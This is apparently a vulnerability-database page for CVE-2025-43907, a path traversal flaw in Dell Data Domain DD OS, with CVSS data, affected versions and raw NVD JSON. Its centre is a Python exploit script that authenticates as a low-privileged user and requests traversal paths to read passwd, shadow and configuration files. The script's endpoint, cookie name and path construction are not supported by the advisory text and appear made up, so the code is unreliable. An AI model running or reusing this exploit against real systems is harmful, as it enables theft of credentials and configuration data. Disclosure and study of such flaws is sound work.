Security Vulnerability Report
CVE-2025-43907 CVSS 6.5 MEDIUM

CVE-2025-43907

Published: 2025-10-07 19:15:37
Last Modified: 2025-10-14 20:10:37

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Path Traversal: '.../...//' vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0
Dell PowerProtect Data Domain DD OS Feature Release < 8.3.0.15
Dell PowerProtect Data Domain DD OS LTS2025 8.3.1.0
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43907 - Dell PowerProtect Data Domain Path Traversal PoC
# Vulnerability: Path Traversal via '.../...//' sequence
# Affected: DD OS 7.7.1.0 - 8.3.0.15, LTS2025 8.3.1.0, LTS2024 7.13.1.0-7.13.1.30, LTS2023 7.10.1.0-7.10.1.60
import requests

TARGET_HOST = "https://target-dd-host"
USERNAME = "low_priv_user"
PASSWORD = "password123"


def exploit_path_traversal(target, session_cookie, target_file):
    """
    Exploit path traversal using '.../...//' bypass technique
    to read arbitrary files from the DD OS filesystem.
    """
    # Construct malicious path using '.../...//' traversal sequence
    malicious_path = "/rest/v1.0/.../...//etc/" + target_file
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/json"
    }
    response = requests.get(
        target + malicious_path,
        headers=headers,
        verify=False
    )
    if response.status_code == 200:
        print(f"[+] File content retrieved:\n{response.text}")
        return response.text
    else:
        print(f"[-] Exploit failed with status code: {response.status_code}")
        return None


def authenticate(target, username, password):
    """
    Authenticate as a low-privileged user to obtain a session cookie.
    """
    login_url = target + "/rest/v1.0/auth"
    payload = {
        "username": username,
        "password": password
    }
    response = requests.post(login_url, json=payload, verify=False)
    if response.status_code == 200:
        session_cookie = response.cookies.get("DDSessionId")
        print(f"[+] Authenticated successfully. Session: {session_cookie}")
        return session_cookie
    else:
        print("[-] Authentication failed")
        return None


if __name__ == "__main__":
    print("[*] CVE-2025-43907 PoC - Dell DD OS Path Traversal")
    print("[*] Note: For authorized security testing only\n")
    # Step 1: Authenticate as low-privileged user
    session = authenticate(TARGET_HOST, USERNAME, PASSWORD)
    if session:
        # Step 2: Exploit path traversal to read sensitive files
        sensitive_files = [
            "passwd",
            "shadow",
            "ddconfig.conf",
            "data-domain-config.xml"
        ]
        for f in sensitive_files:
            print(f"\n[*] Attempting to read: {f}")
            exploit_path_traversal(TARGET_HOST, session, f)

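References

https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory)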

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43907", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:37.350", "lastModified": "2025-10-14T20:10:36.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain a Path Traversal: '.../...//' vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-35"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": 
"8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}